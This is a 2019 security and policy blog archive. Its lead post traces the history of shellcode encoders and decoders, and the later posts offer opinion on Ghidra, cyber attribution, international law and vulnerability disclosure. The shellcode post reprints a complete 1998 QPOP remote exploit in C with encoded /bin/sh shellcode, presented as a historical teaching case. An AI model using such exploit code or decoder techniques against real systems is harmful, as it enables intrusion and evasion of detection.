Tuesday, March 12, 2019

The Lost Art of Shellcode Encoder/Decoders

Introduction



Networked intrusion detection systems used to be a thing. But more importantly, stack overflows used to be a thing. And both of the attack that is a stack overflow, and the defense that is an IDS, turned an entire generation of hackers into experts at crafting encoder/decoders, with vestigial codepaths like a coccyx all throughout Metasploit and CANVAS and Core Impact and other tools from that era.

This post is a walkthrough of the entire problem space, from a historical perspective. If you either did not live through this era, or were not involved in information security at a technical level, then this is the only overview you will ever need, assuming you also click all the links and read those papers as well. This is the policy blog, and this post is for policy people who want to get up to speed on both the technical background of the basic cyber domain physics and anyone else interested in the subject: thousands upon thousands of hours writing shellcode went into this piece.


Decoders

A "shellcode decoder" takes an arbitrary encoded string, and then converts it into its original form and then executes it.

In modern times, you rarely use a shellcode decoder, since most places in memory that are readable are not executable so you have a "ROP Chain" instead. But it's important to study shellcode decoders, even if just as a student of history, because they point us to some basic physics in terms how cyber war works.

This simple stack overflow training tool shows how a list of "bad bytes" used to be a very important part of the entire exploitation process (\x00\r\n was a typical minimal set).

Imagine a simpler system, Windows 2000 perhaps, with simpler bugs, a strcpy(stackbuffer, input) or sprintf(stackbuffer,"%s\r\n", input). I'm not going to go over Buffer Overflows 101, as it was 15 years ago, except to say this: It had three simple features.

  • Your string was limited in length
  • Your string could have almost all values, but not 0x00
  • Your string would clobber various variables as you went towards the stored EIP, but you didn't want the program to crash when it used those variables
It's also true that x86 used to be a niche architecture, for specialists. Real hackers were so multi-lingual they often knew more platforms than they had pants. SPARC, MIPS, Alpha, x86, PA-RISC, POWER, etc. And on top of these chips, a multitude of OS types. SunOS was not Solaris was not Irix was not Tru64 was not HP-UX. But they all ran the same buggy software so you would often see exploits that had code for all major platforms in one file.

Zero-Free Shellcode


The first thing everyone did was write a shellcode that contained no zeros. Then you would have to do that for every platform, optimized for size. Then you would do that again, but also avoiding \r\n. Then again for removing spaces and plus signs. Then again, but instead of running /bin/sh and assuming stdin and stdout were useful, it would connect back to a listening host and proxy your connection. 

Clearly this gets old fast. But one shellcode per exploit had a side benefit: Everyone's was slightly different. My shellcode did not look like Duke_'s or Str's. And that made life harder for the primitive IDSs prowling the primordial cyber oceans, like sea scorpions with limited perception and infinite hunger. 

You can see this fascinating display of early-lifeform diversity on many websites, such as here.

This website doesn't say which badbytes are avoided by each shellcode for some reason.

This was an era before giant-botnets and router hackers made it so your exploits were never more than two hops away from your target. So while you COULD play network games to avoid an IDS, say send five different fragments, some of which you knew would get dropped by your target's network layer, but the IDS did not, it was hard to predict how confused the network layer a full second of ping time away from you would handle these kinds of shenanigans. So best to just not be the string they were looking for. 

Early Decoders

Most people very quickly wrote a FOR loop in assembly, that when executed XORed a string behind them with a fixed key. Of course, this sucks in so many ways.

First of all, picking which byte you were going to XOR an unknown string with means that sometimes there is NO byte that does not result in a 0x00 in the resultant string. For small hand-crafted exploits this was no problem: you picked an encoder, xor byte, and payload string and if they did not meet your needs, you adjusted them manually. (CANVAS used an "ADD" instead of an "XOR" for this reason).

As a prescient case study, let's look at Stran9er's BSDi shellcode:

/*
 * QPOP (version 2.4b2) _demonstration_ REMOTE exploit for FreeBSD 2.2.5.
 * and BSDi 2.1
 * 24-Jun-1998 by stran9er
 *
 * Based:
 *         FreeBSD/BSDi shellcode from some bsd_lpr_exploit.c by unknown author.
 *         x86 decode.bin/encode.c by Solar Designer.
 *
 * Disclaimer:
 *         this demonstration code is for educational purposes only! DO NOT USE!
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ESP 0xefbfd480
#define BMW 750

main(int argc, char **argv)
{
   int i,t,offset = 500;
   char buf[1012];
   char nop[] = "\x91\x92\x93\x94\x95\x96\x97\xF8\xF9\xFC\xFD";
   char decode_x86[] =
      "\x68\x5D\x5E\xFF\xD5\xFF\xD4\xFF\xF5\x8B\xF5\x90\x66\x31\x7D\x30"
      "\x33\x7D\x30\x90\x90\x8B\xC7\x66\x2D\x5D\x5D\xD5\x21\x8B\xFD\x83"
      "\xC7\x02\x8B\xEF\x90\x90\x90\x8A\xE0\x8B\xFE\x83\xC6\x01\x32\x67"
      "\x30\x30\x67\x30\x90\x75\xD5";/*\x79\x5F\x7D\x60\x5D\x63\x70\x5E"*/
   char shellcode_BSDi[] =
      "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
      "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
      "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
      "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
   
   fprintf(stderr, "QPOP (FreeBSD v 2.4b2) remote exploit by stran9er. - DO NOT USE! -\n");
   if (argc>1) offset = atoi(argv[1]);
   fprintf (stderr,"Using offset %d (esp==0x%x)",offset,ESP);
   offset+=ESP;
   fprintf (stderr," esp+offset=0x%x\n\n",offset);
   for(i=0;i<sizeof(buf);i++) buf[i]=nop[random()%strlen(nop)];
// memset(buf, 0x90, sizeof(buf));
   buf[sizeof(buf)-1]=0;
   for(i=0;i < (sizeof(decode_x86)-1);i++) buf[i+BMW] = decode_x86[i];
   for(t=0;t < sizeof(shellcode_BSDi);t++) {
    buf[t*2+i+BMW+0] = (unsigned char)shellcode_BSDi[t] % 0x21 + 0x5D;
    buf[t*2+i+BMW+1] = (unsigned char)shellcode_BSDi[t] / 0x21 + 0x5D;
   }
   buf[1008] = (offset & 0xff000000) >> 24;
   buf[1007] = (offset & 0x00ff0000) >> 16;
   buf[1006] = (offset & 0x0000ff00) >> 8;
   buf[1005] = (offset & 0x000000ff);
   printf("%s\n",buf);
}
/* -- CONFIDENTIAL -- */


This code had some interesting features: It randomized the NOP sled, avoiding 0x90 entirely, and it used a nibble encoder to bypass the bad bytes of Qpop. In shellcode used in real exploits (as opposed to academic papers) you are optimizing not for length(arbitrary shellcode), but for length(decoder)+length(encoded specific shellcode) + difficulty of manually writing the decoder. This made nibble encoding (aka, 0xFE -> 0x4F 0x4E) a popular solution even though it doubled the size of your shellcode.

One reason this kind of shellcode decoder was popular is that you often had to pass through a tolower() or toupper() function call on the way to your overflow as back then most overflows were still in strings passed around via text protocols.

Windows 


This brings us to the Windows platform which was notable for two major reasons:

  • Shellcodes needed to be larger to accommodate for finding functions by their hash in the PE header - so expanding them became more dangerous
  • Unicode became a thing
  • You rarely got to attack a service more than once (Unix services often restarted after they crashed, but Windows never did)

Chris Anley was the first to find some ways around the Unicode problem, which he called "Venitian" decoding. Typical UTF-16 would do some horrible things to your shellcode: It would insert zeros as every second byte.

To quote from his paper directly.

Why yes, Chris, that IS a complication.

Other hackers, myself and Phenoelit, included, then furthered this work by formalizing it and generalizing it to particular exploits we were working on in the 2003 era. However, the key realization was essentially that when you started your exploit, there were some things you knew, including the values of registers and particular sets of memory, that made some of these seemingly intractable problems perfectly doable.

AlphaNumeric shellcodes


This brings us to another shellcode innovation (2001) in which various people attacked the heavily restricted filter on x86: isalnum(). What you should be internalizing by now, if you've never written a shellcode decoder, is that each decoder attacked a specific mathematical transformation function of basically arbitrary complexity. The original Phrack article is here, but the code to generate the shellcodes is here. Skylined is still quite active and you can see his INFILTRATE slides here.

Another common shellcode of the time was the eggsearch shellcode, particularly on Windows, where you would need a tiny shellcode that could find a much larger more complicated shellcode, somewhere else in memory. This was quite difficult in practice as your stage-2 shellcode was almost certainly in many different places in RAM, corrupted in different ways. Likewise, searching all of RAM requires handling exceptions when accessing memory that was not mapped. With Windows you had the ability to use the built-in exception handling, but every other platform required a system call that could be used as an oracle to find out if a page was accessible or not. The other major issue was timing: Going through all of RAM takes a long time on older systems, and your connection might time out, triggering cleanups and unfortunate crashes. For systems which stored most of your data in writable but not executable pages, you'll also want to mprotect() it back to something which can execute before jumping to it, which added size and complexity. In writing shellcode, things that seem simple can often be quite complicated.

RISC Shellcode


So far this sojourn through history has ignored some key features with platform diversity: RISC systems. Early RISC systems each had some large subset of the following:

  • branch delay slots
  • code vs data caches
  • aligned instructions
  • register windows
  • huge amounts of registers
  • hardware support for Non-Execute memory pages
  • Per-Program system call numbers (lol!)

Sometimes the stack would go backwards (HPUX) or do other silly things as well (i.e. Irix systems often ran on one of many possible chips each of which was quite different!). There were many more features that Unix hackers dealt with long before Windows or Linux hackers had to.

LSD-PL TTDBSERVERD exploit shellcode for Solaris.
Recently, Horizon and I were reminiscing about the bn,a bn,a which characterized early Solaris SPARC shellcode. The goal of the first set of instructions of almost ANY shellcode is to FIND OUT WHERE IN MEMORY YOU ARE. This is difficult on most platforms, as you cannot just:

 mov $eip, $reg  

Instead, you engaged in some tricks, by using CALL (which typically would PUSH the current address onto the stack or store it in some utility register). In SPARC's case, the branch delay slot meant that the bn,a instruction would "Branch never, and annul (skip over) the next instruction". So the first three instructions in the shellcode above would load the location into a register by calling backwards, then skipping the call function. You'll notice bn,a has \x20 (space) as the first character, which meant a lot of shellcode had instead a slightly longer variant that set a flag with an arithmetic instruction, and then used "branch above" or "branch below" instead, depending on the particular bad bytes in place.

On x86 you could also do funny tricks with the floating point or other extended functions, for example this code by Noir:

"Still not perfect though"


Caching

Many shellcode decoders on RISC had a simple problem: When you change the data of a page, that change might not exist in the CPU's code cache. This led to extremely difficult to debug situations where your shellcode would crash in a RANDOM location on code that seemed perfectly good. And when you attach to it with a debugger and step through it, it would work every time.

The code and data caches get synchronized when any context switch happens or by a special
"Flush" instruction which never ever works for some unknown reason. Context switches happen whenever the CPU decides to execute another thread, which means sometimes you could force your exploit to be more reliable by placing the CPU under load. This of course, also involves "Register Windows" which meant that your use of the stack could be entirely different depending on the load of the processor, with more than one offset in your attack string for EIP. RISC IS NEAT RIGHT?

There were two main reliable ways to handle data vs code cache coherence problems. They were as follows:

  • Include an infinite loop at the end of your shellcode, and modify it to a NOP with your decoder. When the loop is cleared,  you know the cache is flushed!
  • Fork() or call another system call that you know will change contexts and flush the cache. 



ADMmutate

If 1999 K2 (Shane Macaulay) wrote a polymorphic shellcode library called ADMmutate which ended up being the top tier of shellcode operational security tools. The basic theory was that you could mutate almost all elements of your shellcode, and still have it work reliably. He explains the basic technique thusly:

So what do we have now? We have encoded shellcode, and substituted NOP's, all we need is to place our decoder into the code. What we have to be careful about is to produce code that resists signature analysis. It would not be cool if the IDS vendor could simply detect our decoder. 
Some techniques that are used here are multiple code paths, non operational pad instructions, out-of-order decoder generation and randomly generated instructions. 
For instance, if we intend to load a register with some known data (our decode key), we can push DATA, pop REGISTER or we can move DATA,REGISTER or CLEAR REGISTER, add DATA,REGISTER, etc... endless possibilities. Each instruction of the decoder can be substituted by any number equivalent instructions, so long as the algorithm is not changed. 
Another technique is non operational padding, to accomplish this, when generating the decoder we ensure that there are some spare CPU registers that are left available for any operation we see fit. For example, on IA32 EAX was selected, as it is optimized to be used with many instructions, and is occasionally the implicit target of an operation. 
This allows us to pad every instruction in our decoder with one of or more JUNKS!!! MUL X EAX, SHR X EAX, TEST EAX,EAX, etc... (X is randomly selected from an array of integers that passed through all shellcode requirements.) 
To further reduce the pattern of the decoder, out-of-order decoders are now supported. This will allow you to specify where in the decoder certain operational instructions may be located.

What this did when it went public is force every IDS vendor to either acknowledge failure, move to protocol parsing instead of signature detection, or emulate x86 (and other) architectures in order to draw heuristics on likely "executability" of strings.

None of these is a good option, and most of them are extremely RAM and CPU intensive. Yet network IDS systems are supposed to work "at scale". However, even today, most IDSs are still globbing byte streams like it was 1998.

Mutated System Call Numbers

AIX had a neat feature where the system call numbers were not static, which was especially a problem on remote exploits where fingerprinting was difficult. There was a decent paper from San (of XFocus) on this, where he used dtspcd to get a remote system's exact version, and another more recent one, although the better way is probably to build a XCOFF-parser shellcode from the "table of contents" pointer and call LibC functions directly, much as you would do in Windows. You'll note there are relatively a lot less public buffer overflow exploits for AIX than you would expect, if you do a survey, even for locals.

Conclusion

What historical shellcode DID once it ran is the topic of another blogpost, but for now it is easiest from a policy perspective to look at this entire topic as whether or not you have to store state, and if so, where. This concept drives down to the deepest levels of what technology will work on both defense and offense as it is a fundamental tradeoff, like matter vs energy, or Emacs vs VI. Hopefully you got something out of this more technical post! If you liked it, let us know and we'll continue the series with a section on system call proxying.




Monday, March 11, 2019

Ghidra: A meta changer?

The NSA recently released Ghidra (quick overview), which is best described as a binary decompilation tool that competes with IDA and Binary Ninja and R2. However, it has some crucial differences, and like everyone in the business I have a VM loaded with it and I'm going through it feature by feature.

The decompilation window on the right is the obvious game changer. But there are many others hidden within.

Analyzing meta changes in realtime is what a strategist does that differentiates you from a historian. But in order to do this, you need to get your hands dirty with the tool itself. You do, at some level, have to be a computer scientist, and beyond that, a specialist in this technology landscape.

At RSAC 2019 one thing you noticed was everyone had the exact same technology and the exact same business plan. It looks like this:

It is the Cambrian era, and we have invented multi-cellular creatures although basically everything is a Trilobite.
What this tells you is that the whole business model is a race to the price floor, wherever that is. But this also gives you insight into where something like Ghidra might fit into any of these automated pipelines, since one of the bizarre weaknesses of the entire model is they like to pass around IoCs, such as hashes or bad IP addresses, which are silly. With Ghidra, you can look under the covers of any binary a lot easier, and it's free, so everyone will do it at scale.

From a purely business perspective this is also good news for Binary Ninja and IDA, since once people realize this is the new baseline, they will want to embed other analysis engines into their product lineups for various proprietary advantages.

But this leaves us with two questions:

  1. How does commoditized binary analysis at scale change the meta?
    1. What bug classes are now going to be found at scale by the community?
    2. What are people going to build off this technology?
  2. What does a more actively engaged NSA mean for the community? 


Thursday, February 28, 2019

RAND Paper: Qualitatively

A new RAND paper came out this morning at 0-dark-thirty on the benefits/issues of private sector attribution of cyber issues to the USG, which is a weird way to frame the topic. Read it here. A few things stuck out at me when I read the paper: First of which is that the conclusion says exactly nothing, which is not a good sign. To quote it in full below:

Conclusion
After analysis and reflection, we believe that the private sector provides valuable capabilities that augment and support USG interests regarding investigation and attribution of malicious cyber activity. The capabilities and reach of the private sector is obviously strong and broad, and it offers additional information and insights that can bolster existing USG capabilities to detect and manage nation-state and criminal threats. 
Specifically, there are opportunities for increased collaboration between public and private sector that can (and should) leverage personal relationships between former colleagues. And there may be more opportunities for more formal, structured, or frequent interactions. However, as was mentioned during our interviews, a collaboration that is too close or structured could well backfire. And so careful and thoughtful, but deliberate interactions will likely produce the best results for detecting and managing malicious cyber activity directed toward U.S. persons and businesses. 
Here is an alternative conclusion: Google, FireEye, and Crowdstrike are both trusted more, and better at, cyber domain attribution than the US Government ever will be. It is almost certain that the future of this space for the USG is to feed information to private companies and let them do the heavy lifting on both the attribution and deterrence side.

The other major issue with the paper is the concept of asking fifteen experts in a survey what they think, and then writing that down and attempting to draw metrics out of it, as detailed on page 15.

Expert Interviews
In order to better understand the significance that the growing capability of private sector attribution may have for the USG, we performed qualitative research by interviewing 15 senior subject matter experts to explore 4 main topics
I love that phrase "qualitative research" because THAT'S NOT A THING. I don't understand how anyone designs a paper like that in 2019. Half the paper is discussing what those 15 SSME's said, which might have made an interesting Washington Post article with unnamed sources, but is not a whitepaper.

Part of the issue when looking at attribution is that trust is often more about personal reputations than institutional reputations. This is why nobody cares what any particular Government agency says (especially today) but if Rob Joyce or Alex Stamos puts their name on it, they pay attention. And it's not especially relevant when a government issues an attribution note, if that information doesn't change anything except to a cyber insurance company that wasn't going to pay out for an incident anyways, or as a speaking indictment for a group of contractors in Russia who now just can't come to DefCon.








Wednesday, February 27, 2019

AI and Reasoning about a new Meta

Both regulatory action (including export controls) and efforts to promote activity in AI have been hilarious jokes. Part of this is the nature of the problem: AI and ML are a general set of techniques that became possible when we had enough of both compute and data in one place.

Regulating the data that feeds into AI at first makes more sense than trying to regulate Tensorflow chips, which at best are a cost-savings mechanism, or the ML algorithms since we honestly don't know how they work anyways, or even the final product, which can be trivially reproduced by someone with the data.

But regulating "large useful databases" runs into a number of other problems. How much data is "too much"? Do you only regulate labeled databases? What if someone exports and then COMBINES two databases?  What if someone exports the labels separately from the databases?

The larger question then becomes: Can we build a stable human society that does not depend on controlling the spread of technology? 

Or even an easier, but still frustrating question: Is the shape of the way human societies work predictable, based on what we know of new technology? 

Every so often they introduce a new character into Overwatch, or manipulate the values of various character's skills. And professional teams then analyze them and try to figure out how to gain non-obvious advantages. The "working set" of characters is then called "The Meta". But why can't this be calculated ahead of time? Why did it take some random team named "GOATS" to realize you don't need any DPS characters at all to be unstoppable? 


This problem has been gnawing at me for a while. It's seemingly easy at first, but then requires a complex enough model that you are afraid you're just going to monte carlo it, which feels like failure. It's possible there's a more clever AI-based solution.

I fall into the crowd of people who think AI is the solution to everything - if for no other reason than the more you look at science itself, the more you think we will need an artificial brain to help us make forward progress. These days you have to micro-specialize in any field. But an Scientist-AI would not have to, and I feel like that's the race every country SHOULD be on, as opposed to trying to figure out how to integrate AI into battle planning or specialized sensor networks. In that sense the Meta leans towards teams who have an AI to help them figure out the Meta...

Tuesday, February 26, 2019

International Humanitarian Cyber Law

Image result for red cross cyber
CYBER FIRST AID FOR CYBER INTERNATIONAL LAW ANALYSIS

So Friday I attended a meeting with the Red Cross in DC aimed at discussing the issues around extending international humanitarian law tenets (IHL) to the cyber domain. I'm going to assume it was under a ruleset that prevents me from naming names or specific positions. But I wanted to write down some take-aways to help future analysis of proposals to interpret IHL in particular ways. As one lawyer says "If you give me the choice of writing the law, or interpreting the law, I take interpreting ten out of ten times".

It was pointed out that we do, as a country, take IHL into account when planning cyber ops, as we do with operations in any domain. But that doesn't mean there's nearly as cut and dry a port of the existing concepts that many international humanitarian lawyers want.

You'll find yourself, as you think about this stuff, asking many questions, for example:

  • Can we create a standard interpretation of the law that works on both easy targets and hard targets? The difference is often that with an easy target, you have direct control of your implants and your operation, and the effect you are trying to have may also be very direct and simple. With a more complex targets, you may be launching a worm into a system and hoping for an effect, and your targeting may have to be more diffuse to give you any hope at all.
  • Can we create a useful interpretation of IHL when none of the terms are defined when it comes to cyber? If North Korea takes out Sony Pictures Entertainment, what is the proportional response in the cyber domain? What does it mean to be indiscriminate in the cyber domain?
  • Is data a "Civilian Object"? And of course, if it is, does that mean governments can't use cloud hosting with civilians? The implications are an endless fractal of regulatory pain.
  • Is OPSEC or IHL driving any particular policy? It's impossible to tell, since everything is handled covertly in this space, whether we refrained from an action for OPSEC or IHL reasons. Or if there is a collision, does OPSEC win? Because hiding from attribution may require not looking like your op was written by a legal team in Brussels... This is a particularly hard problem because other domains we tend to have a massive advantage, but in Cyber we are essentially peer-on-peer, and may not have the overwhelming force necessary to take all the precautions the IHL lawyers would prefer.
  • How do you apply this in a space that has extremely fuzzy attribution at best? (Attendees wanted to basically live on the hopes that attribution would become a mostly solved problem - which I personally found hilarious)
  • How well does this all work when no two states agree on anything in the space? Obviously meetings like this are an attempt to get some level of agreement between parties, but it may not be possible to get agreements that any large set of states agree on.
Many lawyers in this space, even the aggressively pro-IHL lawyers, assume that "access" and "ops" are quite different, and most say that all access is fine. Access whatever you want, as long as you don't turn it off on purpose. I find this interesting in the case that access really does require risk. It's impossible to test your router trojans perfectly, and sometimes they take whole countries offline by mistake.

So much in whether something is deemed to be violating IHL is about the "intent" of the attacker, which typically is going to be completely opaque. Various lawyers will also point out that different aspects of laws apply depending on whether an armed conflict is already happening, which I frankly think is avoiding the issues at stake and hoping to come to an agreement on principals nobody really feels they will ever have to put into practice.

Activists (and citizens) probably have a different opinion on access vs ops, at least based on the reaction to Snowden. They might claim that even accessing their naked pictures violates, if not IHL, then some universal right to privacy. But this starts reaching into the issues we have with espionage law, and how we define domestic traffic, and a whole host of other things that are equally unsettled and unsettling.

Monday, February 18, 2019

Review: Bytes, Bombs, and Spies

It should have been titled bytes bombes and spies. A lost opportunity for historical puns!


In my opinion, this book proved the exact opposite of its thesis, and because of that, it predicts, like the groundhog, another 20 years of cyber winter. I say that without yet mentioning what the book's overall thesis is, which is that it's possible to think intelligently about cyber policy without a computer science degree or clearance. That is, is it possible to use the same strategic policy frameworks we derived for the cold war going into a global war of disintermediation? You can hence judge this book on the coherence of its response to the questions it manages to pose.

It's no mistake that the best chapter in the book, David Aucsmith's dissection of the entire landscape, is also its most radical. Everything is broken, he explains, and we might have to reset our entire understanding to begin to fix it. You can read his thoughts online here.

Westphalia is no longer the strongest force, perhaps.


Jason Healey also did some great work in his chapter, if for no other reason than he delved into his own disillusionment more than usual.



Yeah, about that...

But those sorts of highlights are rare (in cyber policy writing in general but also in this book). 

Read any Richard Haass article or his book and you will see personified the dead philosophy of the cold war reaching up from its well deserved grave: Stability at any cost, at the price of justice or truth or innovation. At the cost of anything and everything. This is the old mind-killer speaking - the dread of species-ending nuclear annihilation. 

What that generation of policy thinkers fears more than anything is destabilization. And that filters into this book as well.

Is stability the same as control?

Every policy thinker in the space recognizes now, if only to bemoan them, the vast differences between the old way and the new:

The domain built out of exceptions...
But then many of the chapters fade into incoherence.

This is just bad.

Are we making massive policy differentiations based on the supposed intent of code again? Yes, yes we are. Pages 180 and 270 of the book disagree even on larger strategic intent of one of the most important historical cyber attacks, Shamoon, which is alternately a response to a wiper attack and a retaliation for Stuxnet. Both cannot be correct and it's weird the editors didn't catch this.

What is your rules of engagement if not code running at wire speed, perhaps in unknowable ways, the way AI is wont to do, but even if not AI, can you truly understand the emergent systems that are your codebase or are you just fooling yourself?

There are bad notes to the book as well: Every chapter that goes over the imagined order of operations for what an offensive cyber operation would look like, and which US military units would do what, has a short self life, although possibly this is the only book you'll find that kind of analysis currently.

But any time you see this definition for cyber weapons you are reading nonsense, of the exact type that indicates the authors should go get that computer science degree they assume isn't needed, or at least start writing as if their audience has one:

Why do people use this completely broken mental model?

Likewise, one chapter focused entirely on how bad people felt when surveyed about their theoretical feelings around a cyber attack. Surveys are a bad way to do science in general and the entire social science club has moved on from them and started treating humans like the great apes we are.

That chapter does have one of my favorite bits though, when it examines how out of sorts the Tallinn manual is:

"Our whole process is wrong but ... whatevs!"

So here's the question for people who've also read the whole book: Did we move forward in any unit larger than a Planck length? And if not, what would it take to get us some forward motion? 



Tuesday, February 5, 2019

Iconoclastic Doctrine

I gave a talk at a private intelligence and law enforcement function a few months ago and I wanted to write up part of it for the blog and it went as follows:


Hacking, and hence cyber war, is in many ways the discipline of controlled iconoclasty. There's really two philosophies for mature hackers - people who want to be far ahead of the world, who prove how smart they are by finding bugs and using them in unexpected ways. Essentially characters who put all their stats into vulnerability development. Then there's operators, who can take literally any security weakness no matter how small, and walk that all the way to domain admin. The generational split here, for 90's hackers, used to be cross site scripting, which was viewed largely like a vegan burger at a Texas Bar-B-Q.

There are other generational splits that never happened for hackers, but which I see affect cyber policy. When you read about hackers in the news, you often hear not that they are 400 pound bedridden Russophiles, but that they are transgendered:


If you're not part of the hacker community, like, say if you do government policy for a living, it's easy to miss how much higher the percentage of transgender people are at all levels of the information security world than in the outside world. Hacking requires a mental courage to go your own direction and the clarity to examine societies' norms and discard the ones that don't work for you. If you're looking for cyber talent, you're better off with an ad on Fictionmania than on the Super Bowl broadcast.

Even in religious countries, the majority of their offensive cyber force is Atheistic. And support for the transgender community in the fifth Domain is a generation beyond what it is in the other four.

In summary, assuming that your goal is to "ensure US/Allied freedom of action in cyberspace and deny the same to our adversaries" then the transgender ban is like an NBA team banning tall people because they wear larger clothes. It's strategically stupid, and spills over into the IC and entire military industrial construct. It has national-security level implications, and not good ones.


Project the Raven

It's impossible to miss the reporting on Project Raven that came out yesterday, even though on one hand I feel like we've already heard a bit about the UAE's efforts from other reports. I have to admit, I never judge people from media reports. A friend of mine says that you're not really serving your country until your name gets dragged through the mud in the NYT.

Of course, one thing that strikes you as you read these reports is that their significance in the media is somewhat belied by the fact that the whole effort appears to fit INTO A VILLA.

I find this imbalance is true in a lot of areas of computer security. The number of hours it takes to implement an export control on some items is ten times larger than the number of hours to re-build that whole item overseas in a non-controlled country. This kind of wacky ratio isn't true for, say, stealth technology or things that go boom really big.

If you watch the following talk from 2012 I make a prediction, and it is this: I think non-state actors are where the game is. I think that is the big, underlying change that we are trying desperately to ignore.







Friday, January 25, 2019

There is no Escalatory Ladder in the Matrix



I'm still reading Bytes, Bombs and Spies, specifically the chapter where they define "OCO" to mean "Offensive Cyber Operations" and then riff on the concept of how command and control and escalatory ladders would exist in wartime, who would authorize what, how doctrine would evolve, etc.

I know the book is meant to at some level portray that policy can be strategically thought out in the unclassified space, but the deeper I get into it, the less I feel like it makes that point. What does a "constrained regional scope" mean in cyberspace? (note: It means nothing.)

If anything, what this book points out is how little value you can get from traditional political-science terms and concepts. Escalatory ladder makes little sense with a domain where a half-decade of battlefield preparation and pre-placement are required for attacks, where attacks have a more nebulous connection to effect, deniability is a dominant characteristic, and where intelligence gathering and kinetic effect require the same access and where emergent behavior during offensive operations happens far beyond human reaction time.


Wednesday, January 23, 2019

Bytes Bombs and Spies

A shibboleth for whether you should be doing cyber policy work. :)

ISR has to be anticipatory, comprehensive, and real time. And because of that, I'm reading the new compendium of essays edited by Herb Lin and Amy Zegart. The book is dense and long, so I'm not done with it, but I get a very different feeling from it so far than what they've intended I think.

Start by listening to this podcast:
https://www.hoover.org/news/hoover-scholars-examine-cyber-warfare-new-book

In it, a few interesting questions come to light. For example, they say things like this:

  1. Does not know why, unlike with nuclear, the scientific community has not gone into policy with cyber (sociology of knowledge problem) 
  2. Does not think you need a "CS Degree" to work on cyber policy (in comparison to nuclear work, which was more technical in some way) 
Obviously I disagree with both of those things.

There are things you always hear in this kind of podcast:
  • A hazy enumeration of the ways the cyber domain is different
  • War versus not-war legal hairsplitting 
  • Either wishful thinking or doleful laments about cyber norms
  • Massive over-parsing of vague throwaway comments from government officials
For example, the Differences of the Cyber Domain (from this podcast):
  • Intangible - manipulates information
  • It's man made! Laws of physics don't constrain information-weapons so much as imagination.
  • Target Dependance
  • Accumulation problem - lots of copies of the same malware doesn't help. Exploits are time-delimited in a way that is quite different from capabilities in the real world.
Ok, so some real talk here: The first thing a hacker learns is that code and data are the same thing, and both are just state space under the covers. This is why when you build a fuzzer, you can measure "code coverage" but you know that you're just estimating what you REALLY want to explore, which is state space coverage. It's why your exploits can use the thread environment block to store code, or why every language complex enough to be useful has an injection bugclass. I have a whole post coming soon about shellcode encoder decoders to really drive the history of this thing home. ADMutate anyone? 

Anyways, once you understand that in your gut, the way a hacker does, the cyber domain is not at all confusing. It becomes predictable, which is another word for computable.

Deep down, the most ironic thing is Lin's statements about the different physics of the physical and cyber domains because the theory of computation is ALSO the physics of quantum mechanics, which is what we learned when we were building nuclear bombs. 


Friday, January 4, 2019

VEP: Centralized Control is Centralized Risk




When we talk about the strategic risks of a Vulnerability Equities Process people get absorbed in the information security risks. But the risks of any centralized inter-agency control group also include:

  • Time delay on decision making. Operational tempo is a thing. And you can't use a capability and then kill it on purpose on a regular basis without massive impact to your opsec, although this point appears to be lost on a few former members of the VEP. 
    • For teams that need a fast operational tempo (and are capable of it), any time delay can be fatal. 
    • For teams that don't operate like that, you either have to invest in pre-positioning capability you are not going to use (which is quite expensive) or further delay integration until the decision about whether to use it has been made.
  • One-size-fits-all capability building. While there may be plenty of talented individuals for the VEP process, it is unlikely they are all subject matter experts at the size and scale that would be needed for a truly universal process. I.E. the SIGINT usefulness of a SAP XSS may be ... very high for some specialized team.
  • Having multiple arms allows for simpler decision making by each arm, similar to the way an octopus thinks. 
  • Static processes are unlikely to work for the future. Even without enshrining a VEP in law, any bureaucratic engine has massive momentum. A buggy system stays buggy forever, just like a legacy font-rendering library. 
It may not even result in different decisions than a distributed system. For example: Any bug bought/found by SIGINT team is likely to be useful for SIGINT, and retained. Otherwise your SIGINT team is wasting its time and money, right?

Likewise, any bug found externally, say through a government bug bounty, is likely to be disclosed.

Here's a puzzle for you: What happens if your SIGINT team finds a bug in IIS 9, which is an RCE, but hard to exploit, and they work for a while, and produce something super useful. But then, a bit later, that same bug comes in through the bug bounty program DHS has set up, but as an almost useless DoS or information leak? How do you handle the disparity in what YOU know about a bug (exploitability f.e.) versus what the public knows?

Outputs

This leads you into thinking - why is the only output available from the VEP disclosure to a Vendor? Why are we not feeding things to NATO, and our DHS-AntiVirus systems, and building our own patches for strategic deployment, and using 0days for testing our own systems (aka, NSA Red Team?). There are a ton of situations where you would want to issue advisories to the public, or just to internal government use, or to lots of people that are not vendors.

During the VEP Conference you heard this as an undercurrent. People were almost baffled by how useless it was to just give bugs to vendors, since that didn't seem to improve systemic security risks nearly enough. But that's the only option they had thought of? It seems short sighted.